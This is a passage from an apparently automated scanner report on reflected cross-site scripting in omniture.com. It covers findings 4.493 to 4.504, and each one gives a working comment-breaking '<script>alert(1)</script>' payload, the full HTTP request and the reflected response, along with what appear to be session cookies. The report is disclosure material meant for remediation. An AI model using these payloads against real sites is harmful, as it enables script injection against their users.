Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:11:17 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:11:17 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:11:17 GMT
Content-Length: 23135
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:11:17 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>c1f50fee5cf/survey cached on 2 February 2011 at 11:11:17 PST (2fbecc7a1f5d932bd46172df5699aa31) -->
...[SNIP]...

4.493. http://www.omniture.com/en/education/courses/survey [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/survey

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 59f1a--><script>alert(1)</script>4593caff41b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/courses/survey59f1a--><script>alert(1)</script>4593caff41b HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:11:32 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:11:32 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:11:32 GMT
Content-Length: 23135
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:11:32 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>4593caff41b cached on 2 February 2011 at 11:11:32 PST (2efe5d82184b9e2cc864814abe957fa1) -->
...[SNIP]...

4.494. http://www.omniture.com/en/education/courses/testandtarget [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/testandtarget

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 5e525--><script>alert(1)</script>089ba6b7003 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/courses5e525--><script>alert(1)</script>089ba6b7003/testandtarget HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:09:54 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:09:54 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:09:55 GMT
Content-Length: 23149
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:09:54 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>089ba6b7003/testandtarget cached on 2 February 2011 at 11:09:54 PST (12fc4bbc485b8c8782652ea53f17fbfb) -->
...[SNIP]...

4.495. http://www.omniture.com/en/education/courses/testandtarget [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/testandtarget

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 30b8c--><script>alert(1)</script>312aa946626 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/courses/testandtarget30b8c--><script>alert(1)</script>312aa946626 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:10:24 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:10:24 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:10:24 GMT
Content-Length: 23149
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:10:24 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>312aa946626 cached on 2 February 2011 at 11:10:24 PST (66bb7634dc5431f8681317fccb17dfc0) -->
...[SNIP]...

4.496. http://www.omniture.com/en/partners/apply [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/partners/apply

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 72f71--><script>alert(1)</script>642bf68d095 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/partners/apply72f71--><script>alert(1)</script>642bf68d095 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:47:22 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:47:22 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:47:22 GMT
Content-Length: 21437
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:47:22 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Partner Program Overvi
...[SNIP]...
<script>alert(1)</script>642bf68d095 cached on 2 February 2011 at 21:47:22 PST (b96c13c65398ee3662f30ed031587b74) -->
...[SNIP]...

4.497. http://www.omniture.com/en/partners/portal [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/partners/portal

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 73101--><script>alert(1)</script>99b1e32fb65 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/partners/portal73101--><script>alert(1)</script>99b1e32fb65 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:45:39 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:45:39 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:45:39 GMT
Content-Length: 21439
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:45:39 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Partner Program Overvi
...[SNIP]...
<script>alert(1)</script>99b1e32fb65 cached on 2 February 2011 at 21:45:39 PST (7620342ded552d00188eac1cb3ce21fd) -->
...[SNIP]...

4.498. http://www.omniture.com/en/partners/showcase [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/partners/showcase

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload d726f--><script>alert(1)</script>9fa127a1f63 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/partners/showcased726f--><script>alert(1)</script>9fa127a1f63 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:45:33 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:45:33 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:45:33 GMT
Content-Length: 21443
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:45:33 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Partner Program Overvi
...[SNIP]...
<script>alert(1)</script>9fa127a1f63 cached on 2 February 2011 at 21:45:33 PST (21d181ec062bd1080cf09aa79af9756b) -->
...[SNIP]...

4.499. http://www.omniture.com/en/privacy/2o7 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/2o7

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 70054--><script>alert(1)</script>41808e2c041 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/privacy/2o770054--><script>alert(1)</script>41808e2c041?f=2o7 HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_omniture=84542986.5892.0000

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 18:58:28 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 18:58:28 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 18:58:28 GMT
Connection: close
Set-Cookie: omniture_unique=ebb175498c8f1f99e96dd89a83ae888b; path=/; domain=omniture.com
Set-Cookie: cms_site_lang=1; expires=Fri, 04-Mar-2011 18:58:27 GMT; path=/; domain=omniture.com
Set-Cookie: use207=7; path=/; domain=omniture.com
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:58:28 GMT; path=/; domain=omniture.com
Content-Length: 23202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Privacy Center | Online Busines
...[SNIP]...
<script>alert(1)</script>41808e2c041 cached on 2 February 2011 at 10:58:28 PST (a0b4cdb639e587063a261965fbbfee43) -->
...[SNIP]...

4.500. http://www.omniture.com/en/privacy/policy [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/policy

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 4126e--><script>alert(1)</script>a38f011791f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/privacy/policy4126e--><script>alert(1)</script>a38f011791f HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:01:06 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:01:06 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:01:06 GMT
Content-Length: 23208
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:01:06 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Privacy Center | Online Busines
...[SNIP]...
<script>alert(1)</script>a38f011791f cached on 2 February 2011 at 11:01:06 PST (c382ccf8328e2d0693f0e94eb46a891b) -->
...[SNIP]...

4.501. http://www.omniture.com/en/privacy/product [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/product

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload ce612--><script>alert(1)</script>2bc3e19996b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/privacy/productce612--><script>alert(1)</script>2bc3e19996b HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:00:12 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:00:12 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:00:12 GMT
Content-Length: 23210
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:00:12 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Privacy Center | Online Busines
...[SNIP]...
<script>alert(1)</script>2bc3e19996b cached on 2 February 2011 at 11:00:12 PST (7514ae81ef7088f1f2a8f30681394e29) -->
...[SNIP]...

4.502. http://www.omniture.com/en/privacy/visualsciences [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/visualsciences

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 7a562--><script>alert(1)</script>0bfbe56b0c1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/privacy/visualsciences7a562--><script>alert(1)</script>0bfbe56b0c1 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:00:50 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:00:50 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:00:51 GMT
Content-Length: 23224
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:00:50 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Privacy Center | Online Busines
...[SNIP]...
<script>alert(1)</script>0bfbe56b0c1 cached on 2 February 2011 at 11:00:50 PST (a0fdab216257a63ae27f1881086f0652) -->
...[SNIP]...

4.503. http://www.omniture.com/en/privacy/visualsciences/policy [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/visualsciences/policy

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload b07e0--><script>alert(1)</script>bfedc3930f9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/privacy/visualsciencesb07e0--><script>alert(1)</script>bfedc3930f9/policy HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:01:11 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:01:11 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:01:11 GMT
Content-Length: 23238
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:01:11 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Privacy Center | Online Busines
...[SNIP]...
<script>alert(1)</script>bfedc3930f9/policy cached on 2 February 2011 at 11:01:10 PST (6bce7292dc75315b2641fb335d542a37) -->
...[SNIP]...

4.504. http://www.omniture.com/en/privacy/visualsciences/policy [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/visualsciences/policy

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload bdb9d--><script>alert(1)</script>36b580adb33 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

